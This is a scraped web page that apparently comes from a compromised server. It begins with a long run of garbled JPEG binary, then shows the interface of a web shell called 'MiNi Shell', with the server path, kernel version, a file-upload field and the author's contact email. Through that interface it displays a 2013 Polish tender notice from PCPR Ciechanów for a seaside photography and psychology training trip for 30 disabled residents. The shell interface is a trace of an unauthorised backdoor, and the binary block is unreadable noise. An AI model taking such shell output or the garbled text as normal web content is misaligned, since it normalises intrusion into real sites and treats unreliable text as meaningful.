JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/135201-N-2013.html

<p class="kh_header"><b>Ciechanów: Zorganizowanie  i przeprowadzenie 3 - dniowego, wyjazdowego  szkolenia integracyjno-kulturalno-rozwojowego, obejmującego warsztaty z psychologiem oraz szkolenie 
z zakresu podstaw technik fotografii  dla  30  osób niepełnosprawnych mieszkańców powiatu ciechanowskiego, - uczestników projektu Aktywność szansą na zatrudnienie 
i usamodzielnienie, współfinansowanego ze środków Unii Europejskiej, w ramach Europejskiego Funduszu Społecznego oraz 7 opiekunów.</b><br>
<b>Numer ogłoszenia: 135201 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. 17 Stycznia 7, 06-400 Ciechanów, woj. mazowieckie, tel. 023 672 52 16, 673 45 44, faks 023 672 52 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-ciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie  i przeprowadzenie 3 - dniowego, wyjazdowego  szkolenia integracyjno-kulturalno-rozwojowego, obejmującego warsztaty z psychologiem oraz szkolenie 
z zakresu podstaw technik fotografii  dla  30  osób niepełnosprawnych mieszkańców powiatu ciechanowskiego, - uczestników projektu Aktywność szansą na zatrudnienie 
i usamodzielnienie, współfinansowanego ze środków Unii Europejskiej, w ramach Europejskiego Funduszu Społecznego oraz 7 opiekunów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie  i przeprowadzenie 3 - dniowego, wyjazdowego  szkolenia integracyjno-kulturalno-rozwojowego, obejmującego warsztaty z psychologiem oraz szkolenie z zakresu podstaw technik fotografii  dla  30  osób niepełnosprawnych mieszkańców powiatu ciechanowskiego, - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie, współfinansowanego ze środków Unii Europejskiej, 
w ramach Europejskiego Funduszu Społecznego oraz 7 opiekunów.   

Celem wyjazdowego szkolenia integracyjno-kulturalno-rozwojowego jest:
-  wskazanie uczestnikom nowej dziedziny zainteresowania, jaką jest fotografowanie,
- wytworzenie chęci do dalszego ich rozwijania się przez rozbudzenie twórczej postawy wobec świata i siebie,
- rozwijanie praktycznych umiejętności fotograficznych,
- rozwijanie poczucia piękna i wrażliwości estetycznych,
oraz poprawa i  wzmocnienie kompetencji życiowych i społecznych poprzez  pozyskanie umiejętności: radzenia sobie ze stresem i złością, trening komunikacji, trening  asertywności. 

Uczestnikami warsztatu i szkolenia będą osoby niepełnosprawne  ze znaczną  dysfunkcją  narządu ruchu  (w tym trzy poruszające się na wózku inwalidzkim)  oraz  z chorobami  nowotworowymi, układu krążenia, układu pokarmowego,  narządu wzroku, epilepsją. 

Wyjazdowe szkolenie  ma się odbywać i uczestnicy mają być zakwaterowani na terenie tzw. Trójmiasta tj. w jednym z miast wchodzących w jego skład - Gdańsk, Gdynia, Sopot. 
W Hotelu pozbawionym barier architektonicznych, co najmniej 4-gwiazdkowym 
o najwyższych standardach, zlokalizowanym nie dalej niż  200 m od morza, w terminie  od 23 września   do 25  września 2013 roku t.j.: 
początek 23 września od obiadu, zakończenie 25 września obiadem.
Wykonawca zamówienia zapewnia uczestnikom   napoje , owoce, słodycze na podróż w obie strony: na szkolenie i ze szkolenia.

Wykonawca zobowiązany jest: 
1) opracować program szkolenia i przedłożyć go Zamawiającemu w dniu składania ofert jako załącznik do oferty. Program musi zawierać:
a) 	nazwę i zakres szkolenia,
b) 	miejsce (adres hotelu), liczba gwiazdek posiadanych przez hotel, wraz 
z oświadczeniem oferenta, że budynek hotelu pozbawiony jest barier architektonicznych 
c) 	czas trwania szkolenia (daty i godziny) wraz z planem nauczania określającym tematy zajęć  oraz ich wymiar każdego dnia szkolenia oraz atrakcji określonych w pkt. 11) 
wraz czasem ich trwania (daty i godziny),  rozpoczęcia i zakończenia zajęć każdego dnia,
d) 	cel szkolenia (przewidywane efekty)
2)	zapewnić zajęcia z 1 psychologiem i 1  osobą posiadającą kwalifikacje oraz doświadczenie w prowadzeniu zajęć w zakresie nauki fotografowania w czasie wyjazdowego szkolenia - w uzasadnionych przypadkach po podpisaniu umowy za pisemną zgodą Zamawiającego może nastąpić zmiana osób prowadzących zajęcia,
3)	przeprowadzić zajęcia z psychologiem z zakresu komunikacji, asertywności, sposobów radzenie sobie ze stresem w wymiarze 4 godzin lekcyjnych,
4)	przeprowadzić zajęcia teoretyczne i praktyczne z zakresu poznawania technik fotografii w wymiarze 10 godzin lekcyjnych w tym 5 godzin praktycznych.
5)	zapewnić uczestnikom szkolenia salę wyposażoną w sprzęt niezbędny do realizacji tematyki szkolenia i materiały dydaktyczne(w tym: notes, długopis, sztywna teczka) które staną się własnością uczestników szkolenia,
6) zakupić i przekazać uczestnikom 30 sztuk aparatów cyfrowych o parametrach:
	- obiektyw szerokokątny (ekwiwalent ogniskowej min. 24mm, światło min. f/3,2),
	- matryca BSI CMOS +/- 10 Mpix,
	- mechaniczny zoom optyczny,
	- stabilizator obrazu,
	- zintegrowana lampa błyskowa,
	- obsługa kart SD/SDHC/SDXC,
	- wbudowane proste narzędzia edycyjne,
	- nastawy ręczne typu PASM (modyfikowalna przysłona, migawka, ostrość oraz czas),
	- niskie szumy przy wysokich czułościach (od 800 do 3200 ISO),
	- zasilanie akumulatorem litowo-jonowym z możliwością ładowania przez USB,
	- solidna metalowa obudowa,
	- waga do 200 gramów 
	- akcesoria: karta pamięci 8 GB, futerał, ładowarka, kabel USB,
7)	zapewnić uczestnikom szkolenia całodobową opiekę pielęgniarską (1 pielęgniarka);
8)	zapewnić transport dla 37 osób  z siedziby zamawiającego do hotelu w którym będzie  odbywało się szkolenie  i  z powrotem autokarem,  posiadającym aktualne badanie techniczne (autokar pozostawiony do dyspozycji uczestników na czas pobytu);
9)	zapewnić powrót do miejsca zamieszkania 5 uczestnikom wyjazdu szkoleniowego w dniu powrotu do Ciechanowa - łącznie 100 km.
10)	zakwaterować wszystkich uczestników w pokojach jedno, dwu  i trzyosobowych, 
z łazienkami,  w ilości:
     	- 2 pokoje jedno osobowe,
     	- 16 pokoi dwuosobowych, w tym 3 pokoje z przystosowaną łazienką  dla ON
      	- 1 pokój trzyosobowy,
    	wyposażonych co najmniej w węzeł sanitarny, radio, telewizor, czajnik elektryczny, ręczniki;
11)	zapewnić pełne wyżywienie (śniadanie, dwudaniowy obiad z deserem, kolacja) 
w stołówce hotelu oraz ciasto, ciastka, owoce podczas trwania szkolenia;
12)	zapewnić uczestnikom wyjazdu  atrakcje integracyjno-kulturalne: 
1)	1 wycieczkę z przewodnikiem do miejsc historycznych i wyżywieniem podczas wycieczki,
2)	rejs po Zatoce Gdańskiej, 
3)	spacery  nad morze,
4)	uroczystą kolację przy akompaniamencie muzycznym;
13)	ubezpieczyć uczestników, 37 osób, na czas trwania wyjazdowego szkolenia;
14)	informować  o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji warsztatów   informacji o udziale Unii Europejskiej, 
a także oznakowania miejsca realizacji warsztatów , zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013;
15)	przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu wyjazdu m.in. na podstawie formularza ankiety oceniającej, którą wraz 
z opracowanymi wynikami  należy przedstawić Zamawiającemu;
16)	prowadzić  odpowiednią  dokumentację składającą się z:
a)	imiennej listy obecności uczestników (w każdym dniu) szkolenia,
b)	imiennej listy, na której uczestnicy szkolenia będą potwierdzać otrzymanie materiałów dydaktycznych, 
c)	imiennej listy, na której uczestniczy szkolenia będą potwierdzać odbiór aparatów cyfrowych,
d)	imiennej listy, na której uczestnicy szkolenia będą potwierdzać odbiór posiłków 
(w każdym dniu szkolenia),
e)	imienną listę uczestników, potwierdzającą udział uczestników w atrakcjach integracyjno-kulturalnych określonych w pkt  11 ,
f)	ankiet oceniających zajęcia przez  uczestników wyjazdu;
17)	 wydać zaświadczenia o ukończeniu przez uczestników szkolenia;
18)	 niezwłocznie informować Zamawiającego o :
- niezgłaszaniu się uczestnika,
- przerwaniu szkolenia lub rezygnacji uczestnika,
- innych sytuacjach, które mogą mieć wpływ na realizację programu;
19)	przechowywać  pełną  dokumentację  potwierdzającą  realizację przedmiotowego zamówienia  do dnia 31.12.2020 r.;
20)	przekazać  Zamawiającemu w terminie 7 dni od zakończenia szkolenia  , następujące dokumenty:
a)	imiennej listy obecności uczestników (w każdym dniu) szkolenia,
b)	imiennej listy, na której uczestnicy kursu  potwierdzali otrzymanie materiałów dydaktycznych,
c)	imiennej listy, na której uczestnicy szkolenia potwierdzali odbiór aparatów cyfrowych,
d)	imiennej listy, na której uczestnicy  szkolenia potwierdzali odbiór posiłków  
(w każdym dniu szkolenia),
e)	opis  działań  psychologicznych którymi zostali objęci uczestnicy szkolenia i osiągniętych  efektów,
f)	imienną listę na której uczestnicy, potwierdzali odbiór atrakcji integracyjno-kulturalnych, określonych w pkt. 11),
g)	zaświadczeń o ukończeniu przez uczestników szkolenia,
h)	ankiet oceniających realizację  szkolenia przeprowadzonych wśród uczestników wraz z wynikami,
i)	dowodu ubezpieczenia uczestników w czasie trwania wyjazdu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art.22 ust. 1 pzp metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie co najmniej dwóch usług odpowiadających swoim rodzajem i wartościami usługom stanowiącym przedmiot zamówienia, dofinansowanym ze środków Unii Europejskiej. Ocena metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony gdy wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną pielęgniarką posiadającą wykształcenie wyższe oraz co najmniej 10 letni staż w zawodzie oraz dwoma wykładowcami - każdy z Wykładowców musi legitymować się doświadczeniem w postaci przeprowadzenia co najmniej dwóch szkoleń w zakresie tematycznym odpowiadającym zamówieniu. Zamawiający wymaga aby kadra bezpośrednio zaangażowana w prowadzenie szkoleń posiadała wykształcenie wyższe. Wykazane osoby muszą posiadać wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena metodą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ciechanow.pl i http://stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jak w pkt. I.1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. 17 Stycznia 7, 06-400 Ciechanów, pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowany ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com